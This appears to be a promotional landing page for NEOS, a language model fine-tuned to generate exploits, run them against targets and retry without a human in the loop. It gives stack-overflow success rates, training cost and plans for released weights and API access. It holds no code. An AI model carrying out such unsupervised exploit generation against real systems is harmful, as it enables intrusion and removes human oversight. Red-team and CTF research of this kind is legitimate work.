autonomous exploit generation —

The model
that finds
the hole.

NEOS is a language model fine-tuned for offensive security. It generates exploits, tests them against a live target, and retries — without a human in the loop.

Built on Qwen2.5-32B (Apache 2.0). Trained on 20,000+ real cybersecurity examples. Stack overflows, ROP chains, format strings, binary reversing.

Not a chatbot. A pipeline.

58% stack overflow success — v6
75–85% projected — v7 in training
$38 total training cost
autonomous retries per target
131k token context window
01 ABOUT THE MODEL

NEOS started as a question: can a model trained cheaply on real exploit data close the gap with human CTF players? The answer, so far, is yes.

The autonomous loop works like this — given a binary or challenge, NEOS generates candidate exploit code, runs it against the target inside a sandbox, reads the crash output, and refines. It does this up to four times before giving up. On stack overflow targets it currently wins more than half the time.

v7 introduces 21,000 examples covering wider vulnerability classes. Early evals suggest a jump to 75–85% success rate on the same benchmark set. All training runs under $40.

BASEQwen2.5-32B-Instruct
LICENSEApache 2.0
METHODLoRA fine-tuning
QUANT4-bit NF16 / FP16
CONTEXT131,072 tokens
HOSTEDHuggingFace
02 PROJECT STATUS
■ LIVE
v6 — functional
Stack overflow, ret2win, basic ROP chains. Autonomous loop confirmed. Benchmark complete.
58%
■ WIP
v7 — training
21k examples, broader vuln classes. Early evals look good.
~80%
■ NEXT
Public benchmarks
Full eval results + model weights on HuggingFace once v7 completes.
■ NEXT
API access
Hosted inference for red teams and security researchers. Early access via contact below.
03 CONTACT
EMAIL hola@ne-os.com GITHUB rodrigoignaci0 HUGGINGFACE huggingface.co/NEOS LINKEDIN tu-perfil